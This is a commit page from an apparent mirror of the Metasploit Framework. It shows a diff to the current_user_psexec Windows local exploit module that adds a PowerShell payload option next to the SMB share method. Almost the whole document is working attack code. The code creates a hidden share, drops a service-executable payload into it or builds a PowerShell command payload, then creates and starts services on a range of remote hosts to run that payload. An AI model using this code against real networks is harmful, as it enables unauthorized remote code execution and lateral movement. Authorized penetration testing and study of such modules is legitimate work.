infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2404 - Add powershell support for current_user_psexec

bug/bundler_fix
sinn3r 2013-09-20 17:14:55 -05:00
parent 59a201a8d3 96364c78f8
commit 8381bf8646
1 changed files with 43 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
modules/exploits/windows/local/current_user_psexec.rb
View File

@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
include Post::Common include Post::Common
include Post::Windows::Services include Post::Windows::Services
include Exploit::EXE include Exploit::EXE
include Exploit::Powershell
include Post::File include Post::File
def initialize(info={}) def initialize(info={})
@ -44,6 +45,10 @@ class Metasploit3 < Msf::Exploit::Local
[ 'OSVDB', '3106'], [ 'OSVDB', '3106'],
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
], ],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999', 'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ], 'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ], 'SessionTypes' => [ 'meterpreter' ],
@ -59,6 +64,7 @@ class Metasploit3 < Msf::Exploit::Local
]), ]),
OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]), OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]), OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
]) ])
end end
@ -66,36 +72,39 @@ class Metasploit3 < Msf::Exploit::Local
def exploit def exploit
name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10) name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10) display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
if datastore['TECHNIQUE'] == 'SMB'
# XXX Find the domain controller
# XXX Find the domain controller #share_host = datastore["INTERNAL_ADDRESS"] || detect_address
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
print_status "Using #{share_host} as the internal address for victims to get the payload from"
#share_host = datastore["INTERNAL_ADDRESS"] || detect_address # Build a random name for the share and directory
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host share_name = Rex::Text.rand_text_alphanumeric(8)
print_status "Using #{share_host} as the internal address for victims to get the payload from" drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
share_dir = "#{drive}\\#{share_name}"
# Build a random name for the share and directory # Create them
share_name = Rex::Text.rand_text_alphanumeric(8) print_status("Creating share #{share_dir}")
drive = session.fs.file.expand_path("%SYSTEMDRIVE%") session.fs.dir.mkdir(share_dir)
share_dir = "#{drive}\\#{share_name}" cmd_exec("net share #{share_name}=#{share_dir}")
# Create them # Generate an executable from the shellcode and drop it in the share
print_status("Creating share #{share_dir}") # directory
session.fs.dir.mkdir(share_dir) filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
cmd_exec("net share #{share_name}=#{share_dir}") payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)
# Generate an executable from the shellcode and drop it in the share print_status("Dropping payload #{filename}")
# directory write_file("#{share_dir}\\#{filename}", payload_exe)
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)
print_status("Dropping payload #{filename}") service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
write_file("#{share_dir}\\#{filename}", payload_exe) else
service_executable = cmd_psh_payload(payload.encoded)
service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}" end
begin begin
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server| Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
@ -113,7 +122,10 @@ class Metasploit3 < Msf::Exploit::Local
print_status("#{server.ljust(16)} Deleting the service") print_status("#{server.ljust(16)} Deleting the service")
service_delete(name, server) service_delete(name, server)
rescue rescue Rex::TimeoutError
vprint_status("#{server.ljust(16)} Timed out...")
next
rescue RuntimeError, ::Rex::Post::Meterpreter::RequestError
print_error("Exception running payload: #{$!.class} : #{$!}") print_error("Exception running payload: #{$!.class} : #{$!}")
print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!") print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}") print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
@ -121,10 +133,12 @@ class Metasploit3 < Msf::Exploit::Local
end end
end end
ensure ensure
print_status("Deleting share #{share_name}") if datastore['TECHNIQUE'] == 'SMB'
cmd_exec("net share #{share_name} /delete /y") print_status("Deleting share #{share_name}")
print_status("Deleting files #{share_dir}") cmd_exec("net share #{share_name} /delete /y")
cmd_exec("cmd /c rmdir /q /s #{share_dir}") print_status("Deleting files #{share_dir}")
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
end
end end
end end